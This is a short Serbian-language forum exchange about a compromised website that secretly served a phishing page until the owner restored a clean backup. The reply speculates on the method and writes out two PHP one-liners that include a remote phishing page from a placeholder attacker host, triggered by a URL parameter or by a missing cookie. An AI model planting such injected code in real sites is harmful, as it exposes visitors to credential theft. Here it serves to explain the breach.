Citat:
Za sve to vreme na mom domenu se pokazivao moj originalni sadrzaj, ali na neki nacin i u nekim meni nerazumljivim slucajevima je verovatno pozivan i taj lazni ubaceni template, dakle klasicni phishing.
Uglavnom, sredio sam to za par dana, vratio cist backup i posle vise nisam imao problema
|
Da pokušam da nagađam i ovo:
Verovatno je stavio neku banalnu stvar tipa:
Kôd:
if(isset($_GET['phishing'])) die(include('http://zlisajt.tld/phishing.html'));
//sa time što bi "phishing" (iz GET) zamenio nečim privlačnijim pa bi phishing link izgledao tipa: http://tvojsajt.tld/?redir=http://www.ibej.tld/UserAccount/login.se
pri vrhu stranice.
Ili, ako ta web aplikacija ostavlja cookies pri poseti ili logovanju (mada je to manje pouzdano),
može da proverava da li cookies (ili šta god da može da iskoristi u ovu svrhu) postoji i tako razlikuje validne posetioce od onih koje navlači na phishing.
(Podrazumevam da tvoji posetioci nisu meta.)
Kôd:
if(!isset($_COOKIE['poslednja_poseta'])) die(include('http://zlisajt.tld/phishing.html'));
P.S tek sada provalih da si ti zamenio fajlove bekap-om. Trebao sam pažljivije da čitam :| Sorry.
Elem, osim ako passwordi nisu bili problem, možda ono što napisah sa gledanjem skoro menjanih fajlova ipak možeš da iskoristiš uskoro
